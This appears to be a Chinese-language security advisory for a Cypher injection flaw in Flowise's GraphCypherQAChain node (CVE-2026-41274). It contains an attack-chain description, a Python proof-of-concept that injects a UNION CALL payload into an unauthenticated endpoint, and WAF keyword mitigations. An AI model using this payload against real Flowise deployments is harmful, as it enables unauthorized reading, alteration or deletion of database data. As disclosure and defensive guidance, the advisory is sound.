CVE-2026-41274 CVSS 9.8 严重

CVE-2026-41274 Flowise Cypher注入漏洞

披露日期: 2026-04-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41274

漏洞类型

Cypher注入

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Flowise

漏洞概述

Flowise是一个用于构建定制化大语言模型流程的拖放式用户界面。在3.1.0版本之前，其GraphCypherQAChain节点存在输入验证缺失漏洞。该组件将用户提供的输入直接转发到Cypher查询执行管道中，未进行适当的清理。攻击者可利用此漏洞注入任意Cypher命令，并在底层的Neo4j数据库上执行，从而导致数据泄露、篡改或删除。

技术细节

该漏洞源于Flowise中GraphCypherQAChain节点对用户输入处理的不当。该组件旨在将自然语言转换为Neo4j的Cypher查询语句以检索图数据。然而，在受影响版本中，组件直接拼接用户输入到查询逻辑中，缺乏参数化查询或严格的输入过滤。由于CVSS向量显示无需认证（PR:N）且攻击复杂度低（AC:L），攻击者可以通过网络向受影响端点发送特制的数据包。攻击者可以在输入字段中注入恶意Cypher语法（如使用单引号闭合语句并追加UNION、CALL或DELETE指令），从而绕过原始查询逻辑，执行数据库管理操作或窃取敏感数据。

攻击链分析

STEP 1

信息收集

攻击者发现目标正在运行Flowise应用，并确认其版本低于3.1.0。

STEP 2

构造Payload

攻击者构造包含恶意Cypher语法的输入字符串，旨在绕过原生查询逻辑并执行数据库命令（如数据窃取或删除）。

STEP 3

发送恶意请求

攻击者无需认证，直接向Flowise的GraphCypherQAChain接口发送包含恶意Payload的HTTP请求。

STEP 4

执行命令与获取权限

后端Neo4j数据库接收并执行了注入的Cypher命令，攻击者成功读取、修改或删除数据库中的数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Exploit Title: Flowise GraphCypherQAChain Cypher Injection
# Description: Injects a malicious Cypher command to list database labels.

target_url = "http://target-flowise-instance/api/v1/prediction/chatflows"

# Malicious payload to list all labels in the Neo4j database
# This attempts to break out of the intended query structure
payload = "' UNION CALL db.labels() YIELD label RETURN label //"

data = {
    "question": payload,
    "overrideConfig": {
        "nodeType": "graphCypherQAChain"
    }
}

response = requests.post(target_url, json=data)

if response.status_code == 200:
    print("[+] Potential Vulnerability Detected!")
    print("[+] Response:", response.text)
else:
    print("[-] Request failed or target not vulnerable.")

影响范围

Flowise < 3.1.0

防御指南

临时缓解措施

如果无法立即升级，建议在网络边界部署WAF规则以拦截包含常见Cypher注入特征（如UNION、CALL、DELETE等关键字）的请求流量，并暂时禁用GraphCypherQAChain节点的使用。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表